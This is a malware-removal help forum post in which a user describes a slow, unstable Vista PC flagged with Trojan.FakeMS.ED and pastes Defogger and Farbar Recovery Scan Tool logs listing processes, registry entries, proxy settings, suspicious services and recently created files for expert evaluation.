
Log Analysis and Evaluation: Trojan.FakeMS.ED in DLL file

Windows 7   If you have caught a trojan or keep getting virus warnings, you can post the logs from our diagnostic tools here for evaluation by our experts. To remove viruses and trojans, the infected system must first be examined: First steps for help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.

06.12.2014, 10:40   #1
sbr_vfb
 
Trojan.FakeMS.ED in DLL file



Good morning everyone,

I currently have my colleague's computer at home, since he reported frustrating OS instabilities (among other things, explorer.exe stops working) and extreme slowness. I can confirm this; opening a program or doing anything similar on this machine is almost unbearable.

After initially thinking that a single MBAM run would fix it, I am now seeking your advice, since the infection of the machine is apparently more widespread than assumed. The trojan mentioned in the thread title, Trojan.FakeMS.ED, was found in a DLL file in c:\program data\... Attached first are all logs of the scans run so far.

Defogger:
Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 09:18 on 06/12/2014 (finja)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...


-=E.O.F=-

FRST:
Code:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-12-2014
Ran by finja (administrator) on FINJA-PC on 06-12-2014 09:20:56
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.)
HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [eRecoveryService] => [X]
HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH)
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation)
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = 
SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} -  No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} -  No File
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1

FireFox:
========
FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [2014-11-11]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [2014-11-04]
FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04]
FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR StartMenuInternet: Google Chrome - chrome.exe

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.)
S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R1 MpKsl5421b1e8; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{DB19E517-5918-4579-8B90-D6C1402891F0}\MpKsl5421b1e8.sys [39464 2014-12-05] (Microsoft Corporation)
S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation)
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 09:20 - 2014-12-06 09:21 - 00015414 _____ () C:\Users\finja\Desktop\FRST.txt
2014-12-06 09:20 - 2014-12-06 09:21 - 00000000 ____D () C:\FRST
2014-12-06 09:19 - 2014-12-06 09:19 - 01110016 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe
2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log
2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable
2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe
2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt
2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe
2014-12-05 21:51 - 2014-12-06 08:53 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-05 21:07 - 2014-12-05 21:07 - 00000055 _____ () C:\AdwCleanerDebug.txt
2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP
2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp
2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp
2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-12-01 11:06 - 2014-12-05 21:45 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS
2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe
2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe
2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor
2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText
2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT
2014-11-13 13:15 - 2014-12-05 21:09 - 00000000 ____D () C:\AdwCleaner
2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat
2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector
2014-11-11 08:40 - 2014-12-06 08:46 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 08:43 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe
2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump
2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 09:18 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja
2014-12-06 08:56 - 2009-02-27 09:31 - 01196410 _____ () C:\Windows\WindowsUpdate.log
2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65
2014-12-05 21:41 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml
2014-12-05 21:41 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-05 21:41 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-05 21:41 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles
